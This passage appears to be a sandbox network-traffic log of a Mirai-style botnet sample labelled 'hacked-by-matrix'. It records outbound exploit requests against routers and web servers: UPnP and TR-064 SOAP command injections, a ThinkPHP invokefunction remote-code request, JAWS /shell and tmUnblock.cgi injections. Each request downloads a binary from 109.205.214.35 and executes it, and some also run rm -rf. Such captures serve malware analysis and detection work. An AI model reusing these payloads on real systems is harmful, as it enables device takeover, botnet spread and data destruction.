65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1574192.168.2.134106259.22.19.757547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.267112017 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:20.135350943 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1575192.168.2.133342431.104.157.1567547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.336405039 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1576192.168.2.1336264201.213.210.2047547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.498994112 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1577192.168.2.1357092112.245.54.3280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.500238895 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:19.841345072 CET321INHTTP/1.1 400 Bad Request
                                                        Server: Server
                                                        Date: Thu, 21 Mar 2024 04:23:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1578192.168.2.1346900112.197.74.3480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.562009096 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:19.932882071 CET339INHTTP/1.0 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 11:23:19 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1579192.168.2.1346194115.19.239.847547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.814002991 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1580192.168.2.1345816115.19.239.847547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:19.948868036 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1581192.168.2.1336284201.213.210.2047547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:20.212197065 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1582192.168.2.1359890190.218.8.12380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:20.339332104 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:20.517965078 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:20 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1583192.168.2.1336300201.213.210.2047547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:20.463382959 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1584192.168.2.134108059.22.19.757547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:20.558520079 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1585192.168.2.1335442172.64.128.408080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:20.651823044 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:20.927350044 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1586192.168.2.1353150172.65.178.578080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:20.651870966 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1587192.168.2.1348104172.75.216.648080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:20.678720951 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1588192.168.2.1360270172.87.217.2458080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:20.716264009 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:24.844238043 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:30.992224932 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:43.023353100 CET110OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1589192.168.2.134882088.151.32.10580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.092905045 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:21.260183096 CET337INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.1
                                                        Date: Thu, 21 Mar 2024 04:23:30 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 173
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1590192.168.2.134102688.214.58.8080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.094793081 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:21.264272928 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:21 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1591192.168.2.135855088.198.66.480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.099961996 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:22.067362070 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:22.257278919 CET503INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:22 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        Content-Length: 309
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 68 6f 70 2e 75 6c 6b 65 72 61 6d 69 6b 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at shop.ulkeramik.de Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1592192.168.2.1346208115.19.239.847547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.133021116 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1593192.168.2.133944834.160.172.21980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:21.257525921 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:21.547333956 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:21.635567904 CET441INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html; charset=UTF-8
                                                        Referrer-Policy: no-referrer
                                                        Content-Length: 273
                                                        Date: Thu, 21 Mar 2024 04:23:21 GMT
